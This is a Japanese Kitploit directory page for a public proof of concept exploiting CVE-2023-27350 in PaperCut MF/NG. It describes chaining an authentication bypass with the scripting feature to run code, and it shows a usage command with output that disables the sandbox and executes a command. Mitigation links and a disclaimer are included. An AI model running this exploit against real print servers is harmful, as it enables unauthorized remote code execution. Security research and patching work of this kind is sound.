Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-27350 — Papercut の脆弱性、影響を受けるバージョンは、すべての OS プラットフォーム上の PaperCut MF または NG バージョン 8.0 以降(パッチ適用済みバージョンを除く)です。 | Kitploit
ツール/GitHubGitHub/royall-researchers/cve-2023-27350
認証と認可脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubroyall-researchers/cve-2023-27350

CVE-2023-27350

Papercut の脆弱性、影響を受けるバージョンは、すべての OS プラットフォーム上の PaperCut MF または NG バージョン 8.0 以降(パッチ適用済みバージョンを除く)です。

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-27350

PaperCut MF/NG に影響する CVE-2023-27350 の POC

##Affected Versions 'PaperCut MF or NG version 8.0 or later (excluding patched versions) on all OS platforms.'

概要

この POC は、認証バイパスの脆弱性と、ビルトインスクリプト機能の悪用を連鎖させてコードを実行します。

使用法

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

緩和策

最新バージョンにアップデートするか、PaperCut セキュリティアドバイザリの指示に従って緩和してください

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

免責事項

このソフトウェアは、純粋に学術研究と効果的な防御技術の開発を目的として作成されており、明示的に許可された場合を除き、システムへの攻撃に使用されることを意図していません。プロジェクトメンテナは、ソフトウェアの誤用に対して責任を負いません。責任を持って使用してください。

ツールをダウンロード